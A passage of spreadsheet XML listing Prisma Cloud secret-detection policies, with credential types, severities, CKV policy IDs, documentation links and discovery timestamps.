      <c r="L623" t="inlineStr"/>
      <c r="M623" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N623" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O623" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P623" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q623" t="inlineStr"/>
      <c r="R623" t="inlineStr"/>
      <c r="S623" t="inlineStr"/>
      <c r="T623" t="b">
        <v>0</v>
      </c>
      <c r="U623" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V623" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W623" t="inlineStr">
        <is>
          <t>Braintree Access Token</t>
        </is>
      </c>
      <c r="X623" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-78</t>
        </is>
      </c>
      <c r="Y623" t="inlineStr"/>
      <c r="Z623" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA623" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB623" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC623" t="inlineStr">
        <is>
          <t>CKV_SECRET_78</t>
        </is>
      </c>
      <c r="AD623" t="b">
        <v>1</v>
      </c>
      <c r="AE623" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF623" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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3" t="inlineStr">
        <is>
          <t>0fcbf2f6-0c28-45bf-90bc-bfa7388e6a8e</t>
        </is>
      </c>
      <c r="AI623" t="inlineStr"/>
      <c r="AJ623" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK623" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="624">
      <c r="A624" t="inlineStr"/>
      <c r="B624" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C624" s="2" t="inlineStr"/>
      <c r="D624" t="inlineStr"/>
      <c r="E624" t="inlineStr"/>
      <c r="F624" t="inlineStr"/>
      <c r="G624" t="b">
        <v>1</v>
      </c>
      <c r="H6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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J624" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K624" t="inlineStr">
        <is>
          <t>PubNub Publish Key detected in code</t>
        </is>
      </c>
      <c r="L624" t="inlineStr"/>
      <c r="M624" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N624" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O624" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P624" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q624" t="inlineStr"/>
      <c r="R624" t="inlineStr"/>
      <c r="S624" t="inlineStr"/>
      <c r="T624" t="b">
        <v>0</v>
      </c>
      <c r="U624" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V624" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W624" t="inlineStr">
        <is>
          <t>PubNub Publish Key</t>
        </is>
      </c>
      <c r="X624" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-93</t>
        </is>
      </c>
      <c r="Y624" t="inlineStr"/>
      <c r="Z624" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA624" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB624" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC624" t="inlineStr">
        <is>
          <t>CKV_SECRET_93</t>
        </is>
      </c>
      <c r="AD624" t="b">
        <v>1</v>
      </c>
      <c r="AE624" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF624" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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4" t="inlineStr">
        <is>
          <t>35d8a93a-6160-40f8-8cbc-4d01f8be442c</t>
        </is>
      </c>
      <c r="AI624" t="inlineStr"/>
      <c r="AJ624" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK624" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="625">
      <c r="A625" t="inlineStr"/>
      <c r="B625" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C625" s="2" t="inlineStr"/>
      <c r="D625" t="inlineStr"/>
      <c r="E625" t="inlineStr"/>
      <c r="F625" t="inlineStr"/>
      <c r="G625" t="b">
        <v>1</v>
      </c>
      <c r="H6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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J625" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K625" t="inlineStr">
        <is>
          <t>New Relic APM license key detected in code</t>
        </is>
      </c>
      <c r="L625" t="inlineStr"/>
      <c r="M625" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N625" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O625" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P625" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q625" t="inlineStr"/>
      <c r="R625" t="inlineStr"/>
      <c r="S625" t="inlineStr"/>
      <c r="T625" t="b">
        <v>0</v>
      </c>
      <c r="U625" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V625" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W625" t="inlineStr">
        <is>
          <t>New Relic APM license key</t>
        </is>
      </c>
      <c r="X625" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-240</t>
        </is>
      </c>
      <c r="Y625" t="inlineStr"/>
      <c r="Z625" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA625" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB625" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC625" t="inlineStr">
        <is>
          <t>CKV_SECRET_240</t>
        </is>
      </c>
      <c r="AD625" t="b">
        <v>1</v>
      </c>
      <c r="AE625" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF625" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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5" t="inlineStr">
        <is>
          <t>950ebe76-7e17-417b-8c38-d0960b3ff90b</t>
        </is>
      </c>
      <c r="AI625" t="inlineStr"/>
      <c r="AJ625" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK625" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="626">
      <c r="A626" t="inlineStr"/>
      <c r="B626" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C626" s="2" t="inlineStr"/>
      <c r="D626" t="inlineStr"/>
      <c r="E626" t="inlineStr"/>
      <c r="F626" t="inlineStr"/>
      <c r="G626" t="b">
        <v>1</v>
      </c>
      <c r="H6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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J626" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K626" t="inlineStr">
        <is>
          <t>Atlassian Oauth2 Key detected in code</t>
        </is>
      </c>
      <c r="L626" t="inlineStr"/>
      <c r="M626" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N626" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O626" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P626" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q626" t="inlineStr"/>
      <c r="R626" t="inlineStr"/>
      <c r="S626" t="inlineStr"/>
      <c r="T626" t="b">
        <v>0</v>
      </c>
      <c r="U626" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V626" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W626" t="inlineStr">
        <is>
          <t>Atlassian Oauth2 Keys</t>
        </is>
      </c>
      <c r="X626" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-25</t>
        </is>
      </c>
      <c r="Y626" t="inlineStr"/>
      <c r="Z626" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA626" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB626" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC626" t="inlineStr">
        <is>
          <t>CKV_SECRET_25</t>
        </is>
      </c>
      <c r="AD626" t="b">
        <v>1</v>
      </c>
      <c r="AE626" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF626" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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6" t="inlineStr">
        <is>
          <t>550b4cdd-b107-4bd7-8397-a38b8e32f713</t>
        </is>
      </c>
      <c r="AI626" t="inlineStr"/>
      <c r="AJ626" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK626" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="627">
      <c r="A627" t="inlineStr"/>
      <c r="B627" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C627" s="2" t="inlineStr"/>
      <c r="D627" t="inlineStr"/>
      <c r="E627" t="inlineStr"/>
      <c r="F627" t="inlineStr"/>
      <c r="G627" t="b">
        <v>1</v>
      </c>
      <c r="H6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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J627" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K627" t="inlineStr">
        <is>
          <t>Cloudflare API Credential detected in code</t>
        </is>
      </c>
      <c r="L627" t="inlineStr"/>
      <c r="M627" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N627" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O627" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P627" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q627" t="inlineStr"/>
      <c r="R627" t="inlineStr"/>
      <c r="S627" t="inlineStr"/>
      <c r="T627" t="b">
        <v>0</v>
      </c>
      <c r="U627" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V627" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W627" t="inlineStr">
        <is>
          <t>Cloudflare API Credentials</t>
        </is>
      </c>
      <c r="X627" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-73</t>
        </is>
      </c>
      <c r="Y627" t="inlineStr"/>
      <c r="Z627" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA627" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB627" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC627" t="inlineStr">
        <is>
          <t>CKV_SECRET_73</t>
        </is>
      </c>
      <c r="AD627" t="b">
        <v>1</v>
      </c>
      <c r="AE627" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF627" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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7" t="inlineStr">
        <is>
          <t>fbf7538b-dd40-4afe-a27d-81e118980598</t>
        </is>
      </c>
      <c r="AI627" t="inlineStr"/>
      <c r="AJ627" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK627" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="628">
      <c r="A628" t="inlineStr"/>
      <c r="B628" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C628" s="2" t="inlineStr"/>
      <c r="D628" t="inlineStr"/>
      <c r="E628" t="inlineStr"/>
      <c r="F628" t="inlineStr"/>
      <c r="G628" t="b">
        <v>1</v>
      </c>
      <c r="H6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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J628" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K628" t="inlineStr">
        <is>
          <t>Databricks Authentication Token detected in code</t>
        </is>
      </c>
      <c r="L628" t="inlineStr"/>
      <c r="M628" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N628" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O628" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P628" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q628" t="inlineStr"/>
      <c r="R628" t="inlineStr"/>
      <c r="S628" t="inlineStr"/>
      <c r="T628" t="b">
        <v>0</v>
      </c>
      <c r="U628" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V628" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W628" t="inlineStr">
        <is>
          <t>Databricks Authentication Token</t>
        </is>
      </c>
      <c r="X628" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-33</t>
        </is>
      </c>
      <c r="Y628" t="inlineStr"/>
      <c r="Z628" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA628" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB628" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC628" t="inlineStr">
        <is>
          <t>CKV_SECRET_33</t>
        </is>
      </c>
      <c r="AD628" t="b">
        <v>1</v>
      </c>
      <c r="AE628" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF628" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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8" t="inlineStr">
        <is>
          <t>1979aa5f-0e33-4521-b7aa-0d7f18f298ca</t>
        </is>
      </c>
      <c r="AI628" t="inlineStr"/>
      <c r="AJ628" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK628" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="629">
      <c r="A629" t="inlineStr"/>
      <c r="B629" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C629" s="2" t="inlineStr"/>
      <c r="D629" t="inlineStr"/>
      <c r="E629" t="inlineStr"/>
      <c r="F629" t="inlineStr"/>
      <c r="G629" t="b">
        <v>1</v>
      </c>
      <c r="H6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29" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J629" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K629" t="inlineStr">
        <is>
          <t>Azure Storage Account Access Key detected in code</t>
        </is>
      </c>
      <c r="L629" t="inlineStr"/>
      <c r="M629" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N629" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O629" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P629" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q629" t="inlineStr"/>
      <c r="R629" t="inlineStr"/>
      <c r="S629" t="inlineStr"/>
      <c r="T629" t="b">
        <v>0</v>
      </c>
      <c r="U629" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V629" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W629" t="inlineStr">
        <is>
          <t>Azure Storage Account Access Keys</t>
        </is>
      </c>
      <c r="X629" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-3</t>
        </is>
      </c>
      <c r="Y629" t="inlineStr"/>
      <c r="Z629" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA629" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB629" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC629" t="inlineStr">
        <is>
          <t>CKV_SECRET_3</t>
        </is>
      </c>
      <c r="AD629" t="b">
        <v>1</v>
      </c>
      <c r="AE629" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF629" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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29" t="inlineStr">
        <is>
          <t>12e76aca-9fa6-4eed-92ba-ee6acfe0cbeb</t>
        </is>
      </c>
      <c r="AI629" t="inlineStr"/>
      <c r="AJ629" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK629" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="630">
      <c r="A630" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B630" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C630" s="2" t="inlineStr"/>
      <c r="D630" t="inlineStr"/>
      <c r="E630" t="inlineStr"/>
      <c r="F630" t="inlineStr"/>
      <c r="G630" t="b">
        <v>1</v>
      </c>
      <c r="H6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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J630" t="inlineStr">
        <is>
          <t>Code:Secrets:aws</t>
        </is>
      </c>
      <c r="K630" t="inlineStr">
        <is>
          <t>AWS access keys and secrets are hard coded in infrastructure</t>
        </is>
      </c>
      <c r="L630" t="inlineStr"/>
      <c r="M630" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N630" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O630" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P630" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q630" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R630" t="inlineStr">
        <is>
          <t>5.1.1 Config - Other</t>
        </is>
      </c>
      <c r="S630" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T630" t="b">
        <v>0</v>
      </c>
      <c r="U630" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V630" t="inlineStr">
        <is>
          <t>Code:Secrets:aws</t>
        </is>
      </c>
      <c r="W630" t="inlineStr">
        <is>
          <t>Ensure no hard coded AWS access key or secret key exist in provider</t>
        </is>
      </c>
      <c r="X630" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/secrets-policies/bc-aws-secrets-5</t>
        </is>
      </c>
      <c r="Y630" t="inlineStr"/>
      <c r="Z630" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["aws"]}</t>
        </is>
      </c>
      <c r="AA630" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB630" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC630" t="inlineStr">
        <is>
          <t>CKV_AWS_41</t>
        </is>
      </c>
      <c r="AD630" t="b">
        <v>1</v>
      </c>
      <c r="AE630" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF630" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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0" t="inlineStr">
        <is>
          <t>4cda0308-4a5b-47bb-ad2c-2029c0c01171</t>
        </is>
      </c>
      <c r="AI630" t="inlineStr"/>
      <c r="AJ630" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK630" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="631">
      <c r="A631" t="inlineStr"/>
      <c r="B631" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C631" s="2" t="inlineStr"/>
      <c r="D631" t="inlineStr"/>
      <c r="E631" t="inlineStr"/>
      <c r="F631" t="inlineStr"/>
      <c r="G631" t="b">
        <v>1</v>
      </c>
      <c r="H6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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J631" t="inlineStr">
        <is>
          <t>Code:Secrets:aws-instance</t>
        </is>
      </c>
      <c r="K631" t="inlineStr">
        <is>
          <t>EC2 user data exposes secrets</t>
        </is>
      </c>
      <c r="L631" t="inlineStr"/>
      <c r="M631" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N631" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O631" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P631" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q631" t="inlineStr"/>
      <c r="R631" t="inlineStr"/>
      <c r="S631" t="inlineStr"/>
      <c r="T631" t="b">
        <v>0</v>
      </c>
      <c r="U631" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V631" t="inlineStr">
        <is>
          <t>Code:Secrets:aws-instance</t>
        </is>
      </c>
      <c r="W631" t="inlineStr">
        <is>
          <t>Ensure no hard-coded secrets exist in EC2 user data</t>
        </is>
      </c>
      <c r="X631" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/secrets-policies/bc-aws-secrets-1</t>
        </is>
      </c>
      <c r="Y631" t="inlineStr"/>
      <c r="Z631" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["aws_instance"]}</t>
        </is>
      </c>
      <c r="AA631" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB631" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC631" t="inlineStr">
        <is>
          <t>CKV_AWS_46</t>
        </is>
      </c>
      <c r="AD631" t="b">
        <v>1</v>
      </c>
      <c r="AE631" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF631" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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1" t="inlineStr">
        <is>
          <t>276ece49-0f89-401c-80bd-a0d41d334719</t>
        </is>
      </c>
      <c r="AI631" t="inlineStr"/>
      <c r="AJ631" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK631" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="632">
      <c r="A632" t="inlineStr"/>
      <c r="B632" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C632" s="2" t="inlineStr"/>
      <c r="D632" t="inlineStr"/>
      <c r="E632" t="inlineStr"/>
      <c r="F632" t="inlineStr"/>
      <c r="G632" t="b">
        <v>1</v>
      </c>
      <c r="H6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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J632" t="inlineStr">
        <is>
          <t>Code:Secrets:aws-lambda</t>
        </is>
      </c>
      <c r="K632" t="inlineStr">
        <is>
          <t>Lambda function's environment variables expose secrets</t>
        </is>
      </c>
      <c r="L632" t="inlineStr"/>
      <c r="M632" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N632" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O632" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P632" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q632" t="inlineStr"/>
      <c r="R632" t="inlineStr"/>
      <c r="S632" t="inlineStr"/>
      <c r="T632" t="b">
        <v>0</v>
      </c>
      <c r="U632" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V632" t="inlineStr">
        <is>
          <t>Code:Secrets:aws-lambda-function</t>
        </is>
      </c>
      <c r="W632" t="inlineStr">
        <is>
          <t>Ensure no hard-coded secrets exist in lambda environment</t>
        </is>
      </c>
      <c r="X632" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/secrets-policies/bc-aws-secrets-3</t>
        </is>
      </c>
      <c r="Y632" t="inlineStr"/>
      <c r="Z632" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["aws_lambda_function"]}</t>
        </is>
      </c>
      <c r="AA632" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB632" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC632" t="inlineStr">
        <is>
          <t>CKV_AWS_45</t>
        </is>
      </c>
      <c r="AD632" t="b">
        <v>1</v>
      </c>
      <c r="AE632" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF632" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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2" t="inlineStr">
        <is>
          <t>437d3791-e184-445c-8487-615267f8af83</t>
        </is>
      </c>
      <c r="AI632" t="inlineStr"/>
      <c r="AJ632" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK632" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="633">
      <c r="A633" t="inlineStr"/>
      <c r="B633" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C633" s="2" t="inlineStr"/>
      <c r="D633" t="inlineStr"/>
      <c r="E633" t="inlineStr"/>
      <c r="F633" t="inlineStr"/>
      <c r="G633" t="b">
        <v>1</v>
      </c>
      <c r="H6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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J633" t="inlineStr">
        <is>
          <t>Code:Secrets:azure-key</t>
        </is>
      </c>
      <c r="K633" t="inlineStr">
        <is>
          <t>Azure Key Vault secrets does not have expiration date</t>
        </is>
      </c>
      <c r="L633" t="inlineStr"/>
      <c r="M633" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N633" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O633" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P633" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q633" t="inlineStr"/>
      <c r="R633" t="inlineStr"/>
      <c r="S633" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T633" t="b">
        <v>0</v>
      </c>
      <c r="U633" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V633" t="inlineStr">
        <is>
          <t>Code:Secrets:azure-key-vault-secret</t>
        </is>
      </c>
      <c r="W633" t="inlineStr">
        <is>
          <t>Ensure that the expiration date is set on all secrets</t>
        </is>
      </c>
      <c r="X633" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-secrets-policies/set-an-expiration-date-on-all-secrets</t>
        </is>
      </c>
      <c r="Y633" t="inlineStr"/>
      <c r="Z633" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["azurerm_key_vault_secret"]}</t>
        </is>
      </c>
      <c r="AA633" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB633" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC633" t="inlineStr">
        <is>
          <t>CKV_AZURE_41</t>
